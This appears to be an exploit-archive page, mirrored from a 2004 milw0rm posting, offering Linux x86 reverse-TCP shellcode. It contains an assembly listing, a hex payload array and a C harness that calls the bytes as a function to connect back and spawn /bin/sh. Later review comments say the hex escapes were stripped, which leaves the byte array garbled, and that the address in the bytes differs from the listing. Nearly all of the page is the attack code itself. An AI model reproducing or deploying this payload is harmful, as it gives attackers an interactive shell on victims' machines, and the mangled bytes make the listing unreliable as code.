Linux/x86 – Reverse (/TCP) Shell (/bin/sh) Shellcode (120 bytes)
漏洞ID | 1054656 | 漏洞类型 | |
发布时间 | 2004-09-26 | 更新时间 | 2004-09-26 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Linux_x86 | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
Connecting shellcode written by lamagra <[email protected]>
http://lamagra.seKure.de
May 2000
.file "connect"
.version "01.01"
.text
.align 4
_start:
#socket(AF_INET,SOCK_STREAM,IPPROTO_IP);
movl %esp,%ebp
xorl %edx,%edx
movb $102,%edx
movl %edx,%eax # 102 = socketcall
xorl %ecx,%ecx
movl %ecx,%ebx
incl %ebx # socket()
movl %ebx, -8(%ebp) # 1 = SOCK_STREAM
incl %ebx
movl %ebx, -12(%ebp) # 2 = AF_INET
decl %ebx # 1 = SYS_socket
movl %ecx, -4(%ebp) # 0 = IPPROTO_IP
leal -12(%ebp),%ecx # put args in correct place
int $0x80 # switch to kernel-mode
xorl %ecx,%ecx
movl %eax,-12(%ebp) # save the fd
# connect(fd,(struct sockaddr *)&struct,16);
incl %ebx
movw %ebx,-20(%ebp) # 2 = PF_INET
movw $9999,-18(%ebp) # 9999 = htons(3879);
movl $0x100007f,-16(%ebp) # htonl(IP)
leal -20(%ebp),%eax # struct sockaddr
movl %eax,-8(%ebp) # load the struct
movb $16,-4(%ebp) # 16 = sizeof(sockaddr)
movl %edx,%eax # 102 = socketcall
incl %ebx # 3 = SYS_connect
leal -12(%ebp),%ecx # put args in place
int $0x80 # call socketcall()
# dup2(fd,0-1-2)
xorl %ecx,%ecx
movb $63,%eax # 63 = dup2()
int $0x80
incl %ecx
cmpl $3,%ecx
jne -0xa
# arg[0] = "/bin/sh"
# arg[1] = 0x0
# execve(arg[0],arg);
jmp 0x18
popl %esi
movl %esi,0x8(%ebp)
xorl %eax,%eax
movb %eax,0x7(%esi)
movl %eax,0xc(%ebp)
movb $0xb,%al
movl %esi,%ebx
leal 0x8(%ebp),%ecx
leal 0xc(%ebp),%edx
int $0x80
call -0x1d
.string "/bin/sh"
*/
/* Label printed by main(); it is not part of the payload bytes. */
#define NAME "connecting"
/*
 * code[] is the hex transcript of the assembly listing in the comment above.
 * Per that listing the sequence is: socketcall(SYS_socket), then
 * socketcall(SYS_connect) to an address and port embedded as immediates,
 * a dup2() loop over descriptors 0, 1 and 2, and finally
 * execve("/bin/sh") -- a connect-back shell.
 *
 * NOTE(review): as rendered here the literals read "x89xe5..." with no
 * backslashes, so a compiler stores the ASCII characters 'x', '8', '9', ...
 * and not the machine-code bytes of the listing; the "\x" escapes were
 * presumably stripped when the page was extracted. Read this array as a
 * transcript for analysis, not as the assembled object code.
 *
 * NOTE(review): transcript and listing disagree on the connect() address.
 * The listing stores $0x100007f (bytes 7f 00 00 01 in memory), while the
 * transcript shows "c7 45 f0" followed by 7f 01 01 01. Both values lie in
 * 127.0.0.0/8. The port immediate is consistent between the two: listing
 * $9999, transcript "66 c7 45 ee 0f 27".
 *
 * Observable traits in the transcript: "cd 80" (int $0x80) occurs four times,
 * matching the four syscalls in the listing, and the string "/bin/sh" sits
 * unencoded at the very end.
 */
char code[]=
"x89xe5x31xd2xb2x66x89xd0x31xc9x89xcbx43x89x5dxf8"
"x43x89x5dxf4x4bx89x4dxfcx8dx4dxf4xcdx80x31xc9x89"
"x45xf4x43x66x89x5dxecx66xc7x45xeex0fx27xc7x45xf0"
"x7fx01x01x01x8dx45xecx89x45xf8xc6x45xfcx10x89xd0"
"x43x8dx4dxf4xcdx80x31xc9xb0x3fxcdx80x41x83xf9x03"
"x75xf6xebx18x5ex89x75x08x31xc0x88x46x07x89x45x0c"
"xb0x0bx89xf3x8dx4dx08x8dx55x0cxcdx80xe8xe3xffxff"
"xff/bin/sh";
/*
 * Test harness: prints NAME and strlen(code), then casts the code[] array to
 * a function pointer and calls through it.
 *
 * NOTE(review): no #include lines are visible in this listing, so printf()
 * and strlen() are used without declarations, and main() has no return type;
 * this is pre-C99 style and current compilers reject or warn on it.
 *
 * NOTE(review): code[] is a non-const file-scope array, i.e. ordinary
 * writable data. On platforms that map data pages non-executable the
 * indirect call below typically faults rather than running the bytes --
 * TODO confirm for the target toolchain and kernel.
 */
main()
{
/* Pointer to a function returning int, with unspecified parameters. */
int (*funct)();
/* Reinterpret the address of the data array as a function entry point. */
funct = (int (*)()) code;
/*
 * strlen() stops at the first zero byte, so the printed size equals the
 * array length only if the array holds no embedded NUL. strlen() returns
 * size_t but is printed with %d. NOTE(review): "shellcodentSize" and the
 * trailing "n" look like escape sequences whose backslashes were lost in
 * extraction -- confirm against the original posting.
 */
printf("%s shellcodentSize = %dn",NAME,strlen(code));
/* Transfers control into code[]; the (int) cast result is discarded. */
(int)(*funct)();
}
// milw0rm.com [2004-09-26]